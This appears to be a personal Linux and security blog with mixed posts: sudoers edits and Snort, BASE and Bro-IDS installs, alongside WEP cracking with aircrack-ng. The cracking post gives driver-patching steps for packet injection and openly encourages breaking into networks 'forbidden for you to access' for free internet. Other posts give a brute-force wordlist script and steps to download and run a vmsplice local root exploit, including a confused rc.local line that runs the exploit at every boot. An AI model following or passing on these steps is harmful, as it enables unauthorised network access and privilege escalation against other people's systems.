Edit Sudoers for No Pass Prompt

If you have some script need to run on daily basis such as 'apt-get' maybe you will be thinking on getting rid of password prompt every time you run an 'apt-get' command. And sometime, we wanted to have a script which will autorun on startup and you keep being prompt to enter password. Would you like it to be run fully background? If yes, then you need to edit the 'sudoers' file located in '/etc/' folder.

Before we begin, we may need to really know the power of 'sudo'. If you didnt know what 'sudo' command could be, then do a google search on 'sudo' as a keyword. This could effect your system if you allow users to run such a risky command without password prompt. So, here is steps on how to edit sudoers:

• Open up terminal (Applications > Accessories > Terminal)
• Open up the text editor(i'll be using nano for this tutorial) and edit the /etc/sudoers file.

sudo nano /etc/sudoers

• You will be prompt for password for this one. Enter your user password and the editor will appear. Find line with:

# User privilege specification
root ALL=(ALL) ALL

• And add to the next line your user and what command you would like to allow. For example, my user is "gunblade" and I would like to allow 'apt-get' to run without any password prompt. Then I need to add this line:

# User privilege specification
root ALL=(ALL) ALL
gunblade ALL=NOPASSWD:/usr/bin/apt-get

• But first you need to make sure where is the binary file located. To locate it, use 'which' command. For instance, if you would like to know the exact location of 'apt-get' then you need to run 'which apt-get' and it will return the exact location.

$which apt-get
/usr/bin/apt-get

So here is the tips and trick to do a simple thing on sudoers file. But you need to carefully allow some commands because it could bring damage to your system if you wrongly allow it to users. Some command might be best to have password prompt. Edit it on your own risk~!

Your Access Point being sniff?

As I wondering just how easy someone could break into your protected WEP Access Point(dont use WEP), so i google more in order to look for other application that is fun to play with. And suddenly I stop at one page called WifiZoo.

What is it ?

Well - WifiZoo is tools to gather Wifi information from AP to client details. It could gather all the information about the bssid and eesid also the client connected to it. So to be simple, WifiZoo is quite similar to Airodump-ng. It could gather all sort of information and turn it into .cap files.

Right now, some of the folks on BackTrack currently developing the current wifizoo to intergrate with aircrack and working as info gathering. It'll be a great combination if this tools come in bundle with aircrack.

Capabillitites

Well this WifiZoo could well integrate with kismet to do channel hopping. Default wifizoo can't do channel hop but could easily do the hopping with kismet helps:

• run kismet
• run wifizoo
• wait - it'll work

It can also do channelhop, channelvelocity, channeldwell, defaultchannels and sourcechannels. You just have to edit configuration in kismet.

Requirements

• It need python
• It need scrappy
• and kismet if you want to do channel hopping.

So it's not secure anymore to use wireless connection to do online banking or even chat with your friends about any personal issue cause you will never know who's listening to your conversation.
Maybe next morning, you'll read your own conversation on the net as soon as you woke up.

UBUNTU: SVN aircrack version (1.0 Beta 2)

Sorry for the late follow up on my previous tutorial about aircrack. Life been busy with some programming work and also web designing at my practical company. So here is a quick guide on how to install new version of Aircrack 1.0 beta 2 for ubuntu users.

sudo apt-get install subversion
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng

Now to install the aircrack:

cd aircrack-ng/trunks
make
sudo make install

So this will install the new aircrack to work with latest SuD patch. Some will have errors after applying SuD patch to run Aircrack 0.9.3 on ubuntu. So here is the solution.

As far as I've been using this, still got no problem with the patch nor the aircrack itself. Here is some review I post previously on running aircrack with bcm43xx.

So I assume that this SuD patch is a stable patch for bcm43xx running under Aircrack 1.0 beta 2. Thanks to SuD for the patch, and please leave a comments if any left out in steps given.

Script to generate Numbers Combination

This is a script to generate combinations of numbers from 0-9 depends on how many digits you specify when running the scripts. It's a simple script that took me 5 minutes to write. Plus I got the idea of writing this script from one of my friend.

This script is useful for those who wants to generate a wordlist for bruteforce. Here is the scripts:

#!/bin/sh
# Usage:
# sh [script name] [digits specify] > [output file] &
digit=$1
FINISH=`expr "10^"$digit"" | bc -l`
COUNT="-1"
while [ $COUNT != $FINISH ] ; do
    COUNT=`expr $COUNT + 1`
    printf "%+"$digit"s\n" $COUNT | sed s^\ ^0^g
done

Why do I only write scripts for numbers combination? The answer is simple, if I wrote a script that will create a combination of all ascii letters, then it will be too much for a single machine to generate and also will took you a long long time to generate.

If you want to calculate how much time it will take to generate a combination of digits with quantity of letters(ascii) then you can do calculation on this website, Generator Calculator.

Look at the time needed to generate a full ascii password list. It's not worth your time to do that. If you ever need a full ascii generator, than you can download it right here.

* The script will be update soon to be more user friendly.

Blog: Backup your blog daily~!

Have you ever lost all of your post? or maybe half of it due to technical problems? Or the worst part is you dont even backup you post? I think there are a lot of people have experience this kind of problem. Lost the posts of your blog is a total nightmare for active bloggers.

Give a try for BlogBackup to manage your backup daily. What does BlogBackup offer ?

• It runs over the internet ( which means you can restore or back up your blog anywhere in this world as long as you have internet connection )
• You can set a daily back up of your blog.
• No need installation
• and it works with any blog ( 99% blog is supported )

Does BlogBackup have what it takes to manage your blog's backup? I'll give my personal answer, and it is YES - definitely. Privacy ? yes, and you can read it at the privacy policy.

Patch for iwl4965 testing version

Hello, for those who like to test the aircrack, kismet or any other wifi cracking application need to turun card into monitor mode. As far as I know, iwl4965 is a new chip set from intel, and no patch yet on the net to enable iwl4965 to do packets injection.

So I google aroudn and found out, that there is someone able to do injections using iwl4965 wifi cards and luckily he share the patch for others to give it a try. For those who is interested on playing with Wireless AP, then you can download the patch for iwl4965 from patch iwl4965.

To apply the patch, just do "patch -i [patch filename]" and patch it on kernel source. After that, you need to recompile the modules and copy the new module into your current module directory in order the new patch to work.

more over, if you need some information on the patch, please read the forum discussion about iwl4965 injection here.

Aircrack-ng review on bcm43xx

This post took me 2 days to make it ready. So here is the exact way on how do i crack the WEP in just about 20 mins.

It took 3 steps to make it ready before we can crack the wireless. First you need to know is how does WEP works. You can read about WEP here. So to make it possible to crack using aircrack-ng for bcm43xx, you need to patch your card. I post earlier a how-to patch bcm43xx in this post.

So here is four steps:

• sudo airmon-ng [start|stop|check] [wireless interface] [channel]
  
• sudo airodump [interface] [option] -w [prefix for output file]
  
• sudo aireplay -1 0 -a [target mac] -h [your wireless mac] [interface]
• sudo aireplay -3 -b [target mac] -h [your wireless mac] [interface]

Now wait until airodump capture enough packets (around 1300000+ ) is just enough to crack wep key using aircrack. Once you have finished capturing ivs , now it is time to do the crack.

• sudo aircrack-ng [.cap files]

You can add more option depends on the wep key, for more info about option please refer to the manual page of the command.

UBUNTU: Crack wireless with bcm43xx?

It take me a long long time to learn how to make this one right. First try would be a year ago where I try to use aircrack-ng to crack wireless WEP by using my bcm43xx wifi card. But on that time, broadcom card isnt supported yet for monitoring mode(at least the driver is not supported yet).

But yesterday when I had a chance to chat with one of irc user which his nick I wont published here, we talk several things about wireless security. Meaning, how secure/how fast a secure wireless(WEP/WPA) can be hack and crack. It's all about him on the first place. He manage to find about 60 Access Point at his place and all were encrypted with WEP/WPA.

So, to make it short - Aircrack-ng is the best tools to deal with this situation where you need to a wireless which is forbidden for you to access. Then why not crack it and have your internet connection for free? So we begin discussing on the application, aircrack seem to be the best because it was easy to use. You can learn a little bit about aircrack from here.

So I would like to give my way of configuring my Broadcom(bcm43xx) card to use with aircrack. Now/today bcm43xx is a supported card for injection/monitoring mode/capturing packets but only after you patch the card. Well here is how to setup your bcm43xx:

• #mkdir bcm43xxinject

• #cd bcm43xxinjinect

You now need a sub directory for our kernel output


• #mkdir kernelout


• #cp /boot/config-2.6.22-14-generic ./config-2.6.22-14-generic


• #cd kernelout


• #ln -s ../config-2.6.22-14-generic .config

Now you need to get the kernel source for Gutsy, go get a snack while it downloads, it is about 60 meg.


• #cd ../

• #apt-get source linux-image-2.6.22-14-generic

get the new patch (updated for the new kernel), and patch the kernel:

• #cd linux-source-2.6.22-2.6.22/drivers/net/wireless/bcm43xx ; wget -nc http://www.latinsud.com/bcm/bcm43xx-injection-linux-2.6.20.patch


• #patch -p1 [ exact location of patch file ]

• Now we compile the new bcm kernel module
  
  
• #cd ~/bcm43xxinject/linux-source-2.6.22-2.6.22
  

We have to manually change the version info (bug) so we don't get a tainted kernel.


• #sudo gedit Makefile

change extraversion from "= 9" to "= -14-generic" . This should be the default but it has not been updated yet. Save and exit then:


• #make O=../kernelout outputmakefile

• #make O=../kernelout archprepare


• #make O=../kernelout modules

That last one will take a while. Finish your snack you got before, maybe go watch some tv or something industrious like that.

Now with all gods willing hope this would compile with no errors.

Remember to always backup...


• #cd ..


• #mkdir kernelbackup


• #cd kernelbackup


• #sudo cp /lib/modules/2.6.22-14-generic/kernel/drivers/net/wireless/bcm43xx/*.ko ./

We are finally ready to install our 'pachinko' new patched drivers:

• #cd ..


• #cd kernelout/drivers/net/wireless/bcm43xx/


• #sudo cp -dpR *.ko /lib/modules/2.6.22-14-generic/kernel/drivers/net/wireless/bcm43xx/

Next we have to load our new drivers:


• #sudo modprobe -r bcm43xx

• #sudo modprobe bcm43xx

So now you have your bcm43xx working. Note: If you are using ndiswrapper before this, please remove bcm43xx from your blacklist list so that the module will load on the startup. This is important. If you do not remove bcm43xx from the blacklist list, then there is no point doing this patch.

But if you would like to use ndiswrapper for surfing and all sort of work(except using aircrack) than you dont have to remove bcm43xx from blacklist. All you need to do is:

1. To load bcm43xx :
1. sudo modprobe -r ndiswrapper ; sleep 5 ; sudo modprobe bcm43xx
2. To load ndiswrapper back:
1. sudo modprobe -r bcm43xx ; sleep 5 ; sudo modprobe ndiswrapper

So there you go.. I hope everything would be good for you guys. BCM43XX isnt that bad right?

LINUX: Sguil 0.7.0 is out :)

For those who doesnt know what sguil is, actually sguil is a network monitoring system which capture packet and give alert base on the signature. What is the differences between snort and sguil? well, there is a GUI on sguil, which can easily be handle by Network Admin in daily basis to check the network traffic, alerts and etc.

So Sguil 0.7.0 is out, what is the differences between 0.6.1? well there is a bit of changes in the architecture. As far as I know, in version 0.6.1 there is no PADS in sensoring architecture which is being added in version 0.7.0 for detecting service running on the network.

The workflow is quite same with version 0.6.1 I hope. Still havent got time to try this one out. but as from what I read on the Sguil website, there is a lot of interesting feature added. Really need to give this a try.

Well, for those who would like to give it a try but dont know what is SGUIL, then please refer to the sguil website before proceeding with the installation. Read carefully the requirement and user guide.

LINUX : SSH Tunneling from Windows SSH Server

I've successfully setup Openssh server on my Office Windows XP for tunneling reason. hehe. I need a tunneling box so that I could gain full access to the internet without any block ports when I get back to my schools.

Here is how to setup Openssh on Windows Box:

• Download CGYwin from here. Make a new directory on C:\cgywin and paste the setup.exe which you just download from cgywin.
• Run the setup and choose mirror. When the setup ask for either make cgywin available to all user or just you, then you have to choose "Available to all user". and follow the steps.
• When it ask for a local package directory, point it to C:\cgywin
• On the packages selection, please make sure you select Openssh package to be installed, if not then there is no point setting up everything but openssh isnt installed.

• After finished installing the openssh, we need to set up several things before we can use the console and ssh:
• setup password for current user(make sure user has admin privilege).

• Open My Computer properties, go to Advanced tabs and click on the Environment Variables icon.
• on System Variables, click Edit and insert the value as given:
  
• Variable = CGYWIN | Value = ntsec tty
• Variable = path | Value = (add to the end of line) ";C:\cgywin\bin" without quote.
• And done.. Now logout and login again to the user, make sure the password is active. If it's not active, then maybe you need to restart the Windows.
• Now we need to link user from windows to cgywin so that user can login through ssh.
• open up cgywin console by double click the icon on windows desktop.

• once open, we need to install the sshd.
  we can install the ssh by using this command "ssh-host-config -y"
• and when prompt for "environment variable CGYWIN"= you should answer "ntsec tty"
• now start the ssh by typing "net start sshd" or "cygrunsrv --start sshd"
• still on the cgywin console, type:
• mkpasswd -cl > /etc/passwd
• mkgroup --local > /etc/group

And now we are finished. Now you Open terminal on your linux laptop/pc adn type the command:

• ssh -D 9999 -C @ and enter password you set for the user. walla.. set your internet browser to use the ssh tunneling as proxy then you are good to go.
  

UBUNTU: Setting up SNORT + BASE on Gutsy

Snort (Intrusion Detection System)
BASE (Basic Analysis and Security Engine)
MySQL (Used as database to store alerts and information)
Apache2 (As a web server to view BASE reports)
Gutsy Gibbon (Ubuntu release)

Here is the step to setup SNORT + BASE:

• Gain root access:
• sudo su -
• We need to make the dependencies ready in order to run snort and base on the system. To prepare the dependencies, please apt-get several things or just copy the code below to your terminal:
• apt-get install libpcre3-dev libpcap0.8-dev libmysqlclient15-dev mysql-client-5.0 mysql-server-5.0 bison flex apache2 libapache2-mod-php5 php5-gd php5-mysql libphp-adodb php-pear libc6-dev g++ gcc pcregrep
• Then you have to make a specific folder to gather every source code before we compile. So your system will look neat and you can keep the source code for further use.
• mkdir /snort
• mkdir /etc/snort
• mkdir /etc/snort/rules
• cd /snort
• Now we need to get every files needed to run SNORT and BASE(in this tutorial, we will manually compile each and every single application needed to run SNORT and BASE)
• wget http://www.snort.org/dl/current/snort-2.8.0.1.tar.gz

• wget http://snort.org/pub-bin/downloads.cgi/Download/vrt_pr/snortrules-pr-2.4.tar.gz

• Now extract and compile the source codes:
• tar xvf snort-2.8.0.1.tar.gz ; cd snort-2.8.0.1 ; tar xvf /snort/snortrules-pr-2.4.tar.gz
• ./configure -enable-dynamicplugin --with-mysql
• make
• make install
• Now we need to make things on it's directory(working directory)
• mkdir /etc/snort /etc/snort/rules /var/log/snort
• cd /snort/snort-2.8.0.1/etc
• cp * /etc/snort/
• cd ../rules
• cp * /etc/snort/rules
• Now we need to edit the snort config to suit your network:
• nano /etc/snort/snort.conf
• changer the "var HOME_NET" any to "var HOME_NET 192.168.1.0/24" <-- maybe different ip's for your network.
• change "var EXTERNAL_NET any" to "var EXTERNAL_NET !$HOME_NET"
  
• Next is to change the rules directory to "var RULE_PATH /etc/snort/rules"
• Last, you need to edit how the snort will dump the alert, we will use mysql for this tutorial. Scrolldown the config file and search for "output database" and uncomment the mysql line. You need to edit it to suit your database connection where is user = your username ; password = your user password ; dbname = your dbname ;
• save and quit.
• to keep the setting secure please change mod:
• chmod 600 /etc/snort/snort.conf
• Now we need to setup database to dump the data:
• mysql -u root -p and insert root password
• mysql> create database snort;
• grant all privileges on snort.* to 'snort@localhost' identified by 'snort_password';
• exit
• Now create the tables for the database we just created:
• mysql -D snort -u snort -p < /snort/snort-2.8.0.1/schemas/create_mysql
• use db password you set on the set above.
• Now we test snort:
• snort -c /etc/snort/snort.conf
• if everything running well without any error message, then press 'ctrl+c'
• if you got error, please uncomment lines 97,98 and 452 on "/etc/snort/rules/web-misc.rules". There was a known issue in the past.
• Now is the time to setup BASE:
• cd /snort
• wget http://easynews.dl.sourceforge.net/sourceforge/secureideas/base-1.3.9.tar.gz
• cd /var/www ; tar xvf /snort/base-1.3.9.tar.gz
• mv base-1.3.9 base
  
• chmod 757 base
  
• We will want to use couple of pear modules and make it activated:
• pear install Image_Color
• pear install Image_Canvas-alpha
• pear install Image_Graph-alpha
• NOW IT'S TIME TO SETUP BASE FROM YOR WEB BROWSER:
• open up browser and type this url :
• http://{your hostname}/base/index.php
• Click to continue the first page.
• There will be 5 steps to setup base:
1. Enter ADODB path to = /usr/share/php/adodb
2. insert information about your database that we've created on this tutorial.
3. Check the box if you want to make authentication available.
4. Click on Create BASE AG
5. once step 4 is finished, click "Now Continue to .... "
• Bookmark this page for your access on the future.
• Now to setup snort to run on startup:
• nano /etc/rc.local
• add this before "exit 0"
  
• /usr/local/bin/snort -c /etc/snort/snort.conf -i eth0 -D
• Save and exit.
• Now reboot your box.
• after reboot complete check either snort is running or not by using ps aux command:
• ps aux | grep snort
• if you see a line with "/usr/local/snort -c bla bla bla" then it's mean the snort is running.
• We are done!

Access your alert by using web browser from anywhere by typing the url like "http://www.snortandbase.com/base-1.3.9" and login to view the alert. Please configure your rules to avoid false alarm. Use only rules needed to monitor your box.

Happy Ubuntu-ing~

UBUNTU: vmsplice exploit fix!

I was shocked when i receive an alert from kagesenshi at #myoss freenode.net regarding the kernel exploit which affected kernel 2.6.17 to 2.6.24. So I tried the exploit and in a split second, I got a root access without need to put any password nor sudo command.

What an exploit! actually the exploit do take advantage on splice code use by kernel to gain root access. Ubuntu dev team currently working to release a kernel patch as soon as possible, but either way you need to patch your current kernel before the official patch is release.

Here is the step to patch your kernel:

• Open up terminal:
• wget http://forums.ubuntu.com.my/forumfiles/disable-vmsplice-if-exploitable.c
• cc -o patch disable-vmsplice-if-exploitable.c
• ./patch
• And you're done patching.

But if in a way you would like to test your kernel before patching, here is the guide to exploit your own kernel:

• Open up terminal:
• wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
• cc -o exploits 27704.c
• ./exploits
• And you will have the root. If you not gaining any root access, it means that your kernel is not affected and no need to patch.
• ****UPDATE****
  

• You need to apply it on every session as the patch is run on the active session only. So to make it run on every session even after rebooting your box/desktop/laptop, you need to put it on your rc.local script. To do this:
• sudo mv exploits patch /usr/bin/
• sudo nano /etc/rc.local
• add the following line before "exit 0"
• /usr/bin/exploits sh /usr/bin/patch
  
• So it will run on every startup until the kernel update is release.

It's all from now. Any difficulties regarding the tutorial here please leave a comment.

UBUNTU: Snort + Base setup in progress

Hello, it's been a couple of days since my last post. I got no idea actually. As my last post did mention, "What a boring CNY(for sure it's boring when you dont have any penny to spend for the CNY)"

Now I'm on the process to setup snort+base on my experimental laptop project. Why do I need such thing to run on my old+cheap laptop? because it's accessible from the net through web server, ssh and ftp. Yes, I make a web server at my laptop. To be honest, there is anybody would like to own my laptop but I setup snort and base just to learn about network monitoring plus to get to know what is Intrusion Detection System.

Why do I used IDS(Intrusion Detection System) instead of IPS(Intrusion Prevention System)? The answer is simple, I read a lot of blogs including my favourite blog (Ayoi's Blog) about the different between IDS and IPS.. Well let's get to basic first, I'll learn about Detection process first before proceed to look forward onto Prevention.

My SNORT + BASE has been setup quite well, but a few things need to be configured before I can make a post about the HOW-TO. Mostly signature is the issue. Nevermind, I'll make a HOW-TO as soon as I got time/a peaceful time.

Thanks to Mr Fenris, Mr Papit, Mr Dolphin for helping me out on some issue. Thanks a lot guys!

UBUNTU: Installing Bro-IDS

Today is a public holiday for Kuala Lumpur. It's Wilayah's Day! but it's a bit boring when you dont have any plan to do. So I was a lil bored and currently in a mood of "try and error". So I google around and find a nice tutorial on how to install an IDS call Bro-IDS.

IDS is Intrusion Detetction System which is a common term used by sysadmin on their daily basis working hours. And I'm not one of them for sure. But I'd like to try what they call the basic fundamental of preventing network intrusion. I follow the tutorial here but can't compile the source. So i figure out some additional steps need to be done before compiling the source code.

So I come out with this how-to:

1. First of all you need to get all the dependencies ready before compiling bro-ids source code. To get ready you have to open up terminal and run apt-get :
2. sudo apt-get install libncurses5-dev g++ bison flex libmagic-dev libgeoip-dev libssl-dev
3. After finished installing dependencies, you have to download the source code. In this tutorial i'll use the stable release of Bro-IDS. You can download it here.
4. So, I'll assume that your source code is located at your desktop. Type "cd Desktop/" to go to the desktop folder.
5. Unzip the tarball by using this "tar zxvf bro-1.2-stable.tar.gz"
6. cd bro-1.2.1
7. ./configure
8. make
9. make install
10. make install-brolite

Walla... you're done installing the Bro IDS. Really you need to check the bro.cfg if you fail to run brolite. May be you make a mistake when configuring the bro.cfg while "make install-brolite" process. Happy trying!

Security: Xterendak Defacement!

I recieved a call early this morning from my friend telling me that his website was hacked by a Turkish group. I read about Turkish hackers a few days ago as they are competing on how many web they can deface among the group.

One of the web they did deface is my friend's web: http://www.xterendak.net/v7/index.php
It was a sad day for him and for me because I was one of the admin there. Haha, it's a bit funny. But lesson learn from mistake I've made. Latest patch was not being applied for the website due to laziness among the administrator.

Anyway thanks for reminding us to patch our website to avoid from defacement on the future.